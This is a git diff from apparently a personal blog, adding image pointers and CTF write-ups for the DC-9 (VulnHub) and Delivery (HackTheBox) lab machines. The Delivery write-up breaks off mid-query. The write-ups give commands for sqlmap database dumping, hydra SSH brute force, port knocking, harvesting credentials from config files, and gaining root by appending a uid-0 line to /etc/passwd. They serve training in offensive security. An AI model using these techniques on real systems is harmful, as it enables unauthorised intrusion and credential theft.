+version https://git-lfs.github.com/spec/v1
+oid sha256:17de1ad735251e7c04e4e6a87b01edabf48fe9023a9e335b6600891fc61fabf5
+size 122958
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.png
new file mode 100644
index 0000000..e78617a
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:90604d9657fd977333b5a3d020330a488080328a35e334dac5697956c9f4c719
+size 29831
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.webp
new file mode 100644
index 0000000..408b07f
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9ace903c84e4efada9d8b008e053d95e73dd750b219c88064e0e4756fdc4b6d8
+size 25490
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.png
new file mode 100644
index 0000000..d86f82b
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c75f8ec447aebff85e5720f2e61d167b9f5e9f7e8d04f34cd05c71927befe8e0
+size 44343
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.webp
new file mode 100644
index 0000000..98a337f
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b46da451f1ec3b5297501bbc15cde162c4b8839796fd9f71afe068e68106b3bb
+size 49582
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.png
new file mode 100644
index 0000000..3c6d94b
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e24a20580affa6f89c93e15980bbc8ca66f10b227ab398eb36af703262812309
+size 34693
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.webp
new file mode 100644
index 0000000..53e972f
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7af0948bed4fbfd7cc25382689f582ab58f57b020d629f4b1b9da9f9b7493baf
+size 29634
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.png
new file mode 100644
index 0000000..d9a7165
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f722e870e9a9f5282a496e46dcff7bcd56b2ef09d7238e016ea8db2abfe47d38
+size 14486
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.webp
new file mode 100644
index 0000000..a2bd4c7
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0f36ae8dac022dec347b4b75b4852258b9494ed86b950f3964268a7e986a4181
+size 16686
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.png
new file mode 100644
index 0000000..3efb5ed
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9682cabbf189e69301711b3c13ad571d09cb62db12173f2d58f24339e978aadc
+size 46986
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.webp
new file mode 100644
index 0000000..e0d673c
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:70359dc674f6fd1a8dfadf88431c3385eb4ea415f31d3cc21878d0438913d694
+size 56596
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.png
new file mode 100644
index 0000000..4a089a8
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bf4c1fc651464aeea54d376e6f783291caad7faa5e8b71138e8bb8f18292418b
+size 61783
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.webp
new file mode 100644
index 0000000..bc61ace
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:61acfc45eb4edd08569b72fe3400813c70614bbd98c942b36c3e41df8d2c7704
+size 19384
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.png
new file mode 100644
index 0000000..0f6eb63
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f050e714b6fb1bebef61751ff5d3561e0562974f36d23adbf07c22e257ff74d7
+size 106125
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.webp
new file mode 100644
index 0000000..1f1db91
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c7943c8181d864f7270ba0d7ab45cf6a77d18605776483ced42019bccd71d942
+size 97866
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.png
new file mode 100644
index 0000000..0768c4a
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1673635bc02814fee1cdb62fdee4507a1154846e5a05e970c343e3cdeb8ea60c
+size 18226
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.webp
new file mode 100644
index 0000000..c3f6ce6
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:caf3d4555784f4e0f416827f055aa2dc8ffedb5cb401163864a560d5fc8ed6a4
+size 19198
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.png
new file mode 100644
index 0000000..be2e2d1
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:05ce225d676c31e1ce407246c1b0bd908a03cc357a53e1c1e4a22c14cb98a792
+size 37564
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.webp
new file mode 100644
index 0000000..b630832
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c4c4b8948bf91d18f195b3b266aa3adec84363fc2b4c40ce80687679740f8a47
+size 62438
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.png
new file mode 100644
index 0000000..4ad9a5d
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7e53a8a590503a62efde7599422bf0d68a8d9464b5a398611737924e786df574
+size 121021
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.webp
new file mode 100644
index 0000000..77f3ffa
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1b034f91dabeef7a81dcaf1bb7a5d3f88d6819ca93f7ce8e96e9473a894c11ef
+size 118912
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.png
new file mode 100644
index 0000000..973df2e
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:32710a593d0a2cfb7bd0f632aa9435dcf56c4b9a228f2f3752e18f959ceca5dc
+size 10281
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.webp
new file mode 100644
index 0000000..11be4f2
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:182393ed0059bebd361b7b068332befdb64c8a8577f81c4cd15959b3d7744cd0
+size 9636
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.png
new file mode 100644
index 0000000..d4bc7c8
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:db181ed3308cc1640bb896d8004ee4ae970c09c8d8bffb7e52f4c872e0eff62b
+size 37448
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.webp
new file mode 100644
index 0000000..ee4ea84
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:96697242a1947b571f7a4baba36431a372b3d99c5e346a9549f98b5cbd13e17f
+size 31896
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.png
new file mode 100644
index 0000000..f38674d
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c349d49aea2821aa664f054335ed44e008116687b6b3dac3e0fde72320c8e32f
+size 72497
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.webp
new file mode 100644
index 0000000..bffc694
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ae9b3879770168212f4f999e9d28278e541e93f35fa7997d94b9edc7d9af07d6
+size 64688
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/index.md b/content/writeup-ctf/writeup-dc-9-vulnhub/index.md
new file mode 100644
index 0000000..a57ebc1
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/index.md
@@ -0,0 +1,135 @@
+---
+title: "Writeup - DC-9 (VulnHub)"
+date: 2022-05-10
+slug: "writeup-dc-9-vulnhub"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [DC-9](https://www.vulnhub.com/entry/dc-9,412/) machine from the VulnHub site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 192.168.56.101
+```
+One TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 80/tcp : HTTP web server (Apache 2.4.38)
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I start by making a scan of the website folders.
+
+![](img/image-3.webp)
+
+Quite a lot of different pages, I start by making a capture of a request sent by the `search.php` page with the help of Burp.
+
+I then run a SQL vulnerability scan with `sqlmap`.
+
+
+```bash
+sqlmap -r request.txt --dbs --batch
+```
+The target is usable, I find 3 databases in the result of the command. I start with `users` :
+
+![](img/image-4.webp)
+
+![](img/image-5.webp)
+
+Many different credentials... Looking in the `Staff` database, I find an admin password hash.
+
+![](img/image-6.webp)
+
+So I go on [crackstation](https://crackstation.net/) to try to find it.
+
+![](img/image-7.webp)
+
+I can now connect to the admin panel of the site. In this panel we have the possibility to add records. I notice that at the bottom of the page `manage.php`, there is an error message : `File does not exist`. I wonder if there is not an argument. After some test I find that there is a `file` argument. This allows me to find the following file:
+
+
+```bash
+File does not exist
+[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn 
+```
+This is a file that allows you to configure port knocking to unblock the SSH port!
+
+So I try to realize the sequence with the following commands:
+
+
+```bash
+nmap -Pn --max-retries 0 -p 7469 192.168.56.101
+nmap -Pn --max-retries 0 -p 8475 192.168.56.101
+nmap -Pn --max-retries 0 -p 9842 192.168.56.101
+```
+And indeed it worked, I now have access to the SSH port:
+
+![](img/image-8.webp)
+
+In the database export, we found a lot of names and passwords. I create two lists and launch an automatic test of the different combinations with `hydra` :
+
+![](img/image-9.webp)
+
+After a few minutes `hydra` finds several combinations that work. It is by connecting as a `janitor` that I finally find an interesting file:
+
+![](img/image-10.webp)
+
+A list of passwords, so I add them to my existing list and I restart `hydra` :
+
+![](img/image-11.webp)
+
+A new combination is found! So I connect in SSH.
+
+## Privilege escalation
+
+I start by checking the sudo permissions of my user.
+
+![](img/image-12.webp)
+
+By executing the script I understand that it uses two arguments: one in reading and the other in writing.
+
+
+```bash
+fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test 
+Usage: python test.py read append
+```
+I will try to add a new admin user to the system. To do this I start by generating a hash+salt with the following command:
+
+
+```bash
+fredf@dc-9:~$ openssl passwd -1 -salt d3vyce azerty
+$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1
+```
+I add the line of my user in a temporary file :
+
+
+```bash
+fredf@dc-9:/opt/devstuff/dist/test$ cat ~/user.txt 
+d3vyce:$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1:0:0:root:/root:/bin/bash
+```
+Then I add my user with the following command:
+
+
+```bash
+sudo ./test ~/user.txt /etc/passwd
+```
+Finally I change user:
+
+![](img/image-13.webp)
+
+I now have a root shell on the machine!
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update the site to avoid SQL injection
+- Do not leave an argument `file` if not used
+- Do not store clear passwords in a database
+- Do not let a script run in root if not necessary
diff --git a/content/writeup-ctf/writeup-delivery-htb/featured.png b/content/writeup-ctf/writeup-delivery-htb/featured.png
new file mode 100644
index 0000000..e155c1b
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6f7262234baf3dd0cdb39325168027ac6ff67e9fca4423ddb01317824fcf28c0
+size 310041
diff --git a/content/writeup-ctf/writeup-delivery-htb/featured.webp b/content/writeup-ctf/writeup-delivery-htb/featured.webp
new file mode 100644
index 0000000..e747a36
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b9bf898d00b2a0704be5025d42f640dc8afd9704665003657aa4f9c19c4b9904
+size 30300
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-1.png b/content/writeup-ctf/writeup-delivery-htb/img/image-1.png
new file mode 100644
index 0000000..801bb70
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9505ecfc74d9f669a4a146566e8618cdf8ee216195cd3ae981338f2b5014b7b6
+size 25076
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-1.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-1.webp
new file mode 100644
index 0000000..6ab32b9
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:64d183feb0f353d4c7bd7e9fc979905a40375fcfea69a3ed6a4d3471b8067001
+size 27520
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-10.png b/content/writeup-ctf/writeup-delivery-htb/img/image-10.png
new file mode 100644
index 0000000..1a384a4
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:660bdcd6c7117269aea69138fd65b75396f598d378ce6e93bb07fd073d00488d
+size 35354
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-10.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-10.webp
new file mode 100644
index 0000000..d7d6099
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:77c22356488b6208d6d96907e95a12b2c529f044364ee75af2da9a2e7afb04c7
+size 45502
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-11.png b/content/writeup-ctf/writeup-delivery-htb/img/image-11.png
new file mode 100644
index 0000000..bc6b650
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:51931f223f91c55fee25485d412b695aed87cf1933d13f784bf98153f6e77319
+size 9982
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-11.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-11.webp
new file mode 100644
index 0000000..b78a4f4
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:76cf9676874f355b866b14f7679a60c8fbd6bc5211f70409d04a42bd554c8bd0
+size 11762
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-2.png b/content/writeup-ctf/writeup-delivery-htb/img/image-2.png
new file mode 100644
index 0000000..b21f333
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:160dca0b384c2923a4ec6feb9024a4b22c461ccdc7e171f907005e5da322ebee
+size 1561452
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-2.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-2.webp
new file mode 100644
index 0000000..f3ec2a1
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bad96df211ff777046e28a0356b1838ac7fb4bdbf4645aa40a969ee0bc77c34c
+size 34466
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-3.png b/content/writeup-ctf/writeup-delivery-htb/img/image-3.png
new file mode 100644
index 0000000..35a159f
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:227ed4ec08cd0ad0abc904f499982bb79b1ed1dc0c5ff2f1c017031c640fb341
+size 75032
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-3.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-3.webp
new file mode 100644
index 0000000..41e2b3c
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:966c7a23bb7de8fcb24db74a8d6fe8653f08820b3440f288a5243f38768fa6f6
+size 38280
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-4.png b/content/writeup-ctf/writeup-delivery-htb/img/image-4.png
new file mode 100644
index 0000000..b1a46f4
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5da649dae7e506c0326286c2ca7097d255ca81e4451eea17d427e6314ecd3f00
+size 22649
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-4.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-4.webp
new file mode 100644
index 0000000..ea8c580
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:577421982fa2cc4c17bebc8fa1031ab23d2de33dfdd8799f2352af88542e972a
+size 17594
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-5.png b/content/writeup-ctf/writeup-delivery-htb/img/image-5.png
new file mode 100644
index 0000000..eea5b76
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ff6796fb338fc2a5d471c5aedd1336ba62914401112846536538e07036ed7f3f
+size 63504
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-5.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-5.webp
new file mode 100644
index 0000000..336bca2
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:826060d8b19832cdb57dcd86d23ea6edb6fe1f807d15f45076b0b23929f4d773
+size 46186
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-6.png b/content/writeup-ctf/writeup-delivery-htb/img/image-6.png
new file mode 100644
index 0000000..2260410
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:223568176a1eb5e3a6aca1ca01b5b0cbafe6a7eea3cd9c742eef35ec26262cf3
+size 22609
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-6.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-6.webp
new file mode 100644
index 0000000..6eebda3
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:518af2e113872346508619dd9a91faebe0c40bf77019b083b70ae56fa8fb4d67
+size 13654
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-7.png b/content/writeup-ctf/writeup-delivery-htb/img/image-7.png
new file mode 100644
index 0000000..dc9815a
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ef1663cf0940409fdf0276584b80b6d5e7b4f1dce51fd6b813616ca1b3f9d18c
+size 49865
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-7.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-7.webp
new file mode 100644
index 0000000..6fc999c
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:39cdcea7bca913f7e4cca527ba934ab85680e1c9bb7a2d9af662106515255f9b
+size 35364
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-8.png b/content/writeup-ctf/writeup-delivery-htb/img/image-8.png
new file mode 100644
index 0000000..050ec21
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e516863c8181b6d0a80f175d851f991d8760ac96498b4244b2403c9e1d1f2837
+size 19230
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-8.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-8.webp
new file mode 100644
index 0000000..161f6c1
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6960e0fdd979b157eebe309779ad4c908f54add36427d187409290854403313a
+size 12382
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-9.png b/content/writeup-ctf/writeup-delivery-htb/img/image-9.png
new file mode 100644
index 0000000..d29ef8a
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3ae5e2be1c17c432025a5ff5b46676e9069d6fba9fad2086b19cea3acde3e6dc
+size 45539
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-9.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-9.webp
new file mode 100644
index 0000000..4dc4eee
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fd06676afc3a924198c36568a61f63ba3760c12d48b6d42f27bb8869b3032f4b
+size 32840
diff --git a/content/writeup-ctf/writeup-delivery-htb/index.md b/content/writeup-ctf/writeup-delivery-htb/index.md
new file mode 100644
index 0000000..43aaac6
--- /dev/null
+++ b/content/writeup-ctf/writeup-delivery-htb/index.md
@@ -0,0 +1,169 @@
+---
+title: "Writeup - Delivery (HTB)"
+date: 2022-03-27
+slug: "writeup-delivery-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Delivery](https://app.hackthebox.com/machines/Delivery) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.146
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.9p1)
+- 80/tcp : HTTP web server (nginx 1.14.2)
+- 8065/tcp : ????
+
+![](img/image-2.webp)
+
+## Exploit
+
+After checking the site, I quickly found the `helpdesk` section. It is a site that allows the sending of tickets to support.
+
+![](img/image-3.webp)
+
+I first try to create an account, but it's impossible, I need the validation of an admin to confirm the account. Then I try to create a ticket:
+
+![](img/image-4.webp)
+
+I then go to view it using my email and my ticket number, I arrive on the following page:
+
+![](img/image-5.webp)
+
+In parallel I go to visit the third open port and I find the following page:
+
+![](img/image-6.webp)
+
+I try to create an account, but the site asks me to validate the account via email. I first try to use a temporary email, but I get no confirmation. Then I notice that when I create a helpdesk ticket, it is indicated that I can send emails to the address `3998604@delivery.htb` to add additional information to the ticket. So I use this address when creating the account and when validating I go back to the ticket site and find the following message:
+
+![](img/image-7.webp)
+
+I can now validate my account and log in. I get the following page:
+
+![](img/image-8.webp)
+
+After a little exploration I came across this discussion:
+
+![](img/image-9.webp)
+
+There is a login/password let's try to use it to connect in SSH:
+
+![](img/image-10.webp)
+
+Ok I now have a shell in `maildeliverer` time and I can get the first flag.
+
+## Privilege escalation
+
+I know that the chat application is `mattermost` and that the configuration files for this application are in the `/opt/mattermost`folder. So I start to inspect these files. I find the config file where there are credentials for the access to the database:
+
+
+```bash
+"SqlSettings": {
+        "DriverName": "mysql",
+        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTi$
+        "DataSourceReplicas": [],
+        "DataSourceSearchReplicas": [],
+        "MaxIdleConns": 20,
+        "ConnMaxLifetimeMilliseconds": 3600000,
+        "MaxOpenConns": 300,
+        "Trace": false,
+        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
+        "QueryTimeout": 30,
+        "DisableDatabaseSearch": false
+    },
+```
+I connect with the following command:
+
+
+```bash
+mysql -u mmuser -p Crack_The_MM_Admin_PW -D mattermost
+```
+I first list the tables:
+
+
+```bash
+MariaDB [mattermost]> show TABLES;
++------------------------+
+| Tables_in_mattermost   |
++------------------------+
+| Audits                 |
+| Bots                   |
+| ChannelMemberHistory   |
+[...]
+| Threads                |
+| Tokens                 |
+| UploadSessions         |
+| UserAccessTokens       |
+| UserGroups             |
+| UserTermsOfService     |
+| Users                  |
++------------------------+
+```
+Then I display the data of the Users `Users` :
+
+
+```bash
+MariaDB [mattermost]> SELECT * FROM Users;
